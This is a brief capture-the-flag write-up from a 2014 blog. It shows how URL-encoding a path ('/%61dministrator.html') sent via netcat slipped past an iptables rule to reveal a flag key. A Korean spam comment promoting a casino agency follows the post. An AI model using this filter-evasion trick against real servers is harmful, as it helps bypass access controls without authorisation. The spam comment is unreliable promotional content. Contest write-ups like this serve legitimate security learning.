Monday, May 12, 2014

Hacktrick 2014 - Fuel - Web Write-up

On this quest we need to reach a URL on the server, but iptables was set to prevent anyone from reaching it so the aim was to bypass it. The hint was pointing to a tool called 'fragroute' but we could not make it work and started to look new ways and asked ourselves why not url encode??

send a request like this on netcat:
nc 80.251.47.25 80
GET /%61dministrator.html
and received:
<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
Key : G1mm3fu3lG1mm3fir3
</body>
</html> 

1 comment :

  1. 지난 3월 11일 세마스포츠마케팅은 고진영이 필리핀 기업 블룸베리 리조트 앤 호텔과 메인 후원 계약을 맺고 내년까지 2년간 블룸베리 리조트 앤 호텔 산하 기업인 솔레어 리조트앤카지노의 로고를 달게 된다고 밝혔다. 고진영의 계약조건은 양측의 합의에 따라 밝히지는 않았지만 세계랭킹 1위에 걸맞은 좋은 조건으로 알려졌다. 저희 형제 에이전트 에이전시는 저희를 통하여 게임을 하시는 분들을 위해 항공권 지원, 호텔 숙박비 지원, 현지 관광 안내, 공항 픽업 드랍 서비스를 해드리고 더킹카지노 있습니다.

    ReplyDelete